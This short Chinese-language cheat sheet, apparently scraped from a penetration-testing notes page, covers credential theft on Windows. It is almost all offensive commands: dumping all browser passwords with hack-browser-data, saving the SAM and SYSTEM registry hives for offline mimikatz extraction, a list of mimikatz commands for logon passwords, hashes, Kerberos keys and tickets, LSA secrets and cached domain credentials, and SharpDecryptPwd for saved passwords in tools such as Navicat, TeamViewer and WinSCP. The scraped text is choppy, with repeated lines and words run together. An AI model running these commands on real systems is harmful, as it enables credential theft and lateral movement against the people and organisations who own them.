Windows上的凭据获取
抓取浏览器密码
.\hack-browser-data-windows-64bit.exe -b all -f json --dir results -zip


非mimikatz抓取本地用户密码


mimikatz抓取
windows上第三方软件密码抓取


Last updated
.\hack-browser-data-windows-64bit.exe -b all -f json --dir results -zip






Last updated
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hivmimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exitmimikatz
privilege::debug
sekurlsa::logonpasswords
# 抓取各种密码hash
lsadump::sam
# 获取本地账户凭据
sekurlsa::ekeys
# 检索Kerberos密钥
sekurlsa::tickets /explorts
# 检索并导出Kerberos票证
lsadump::secrets
# 获取lsa机密
lsadump::cache
# 检索缓存的域用户登录凭据 Navicat
Xmanager
TeamViewer
FileZilla
Foxmail
TortoiseSVN
WinSCP
Chrome
RDCMan
SunLoginSharpDecryptPwd Navicat
# 抓取Navicat保存的密码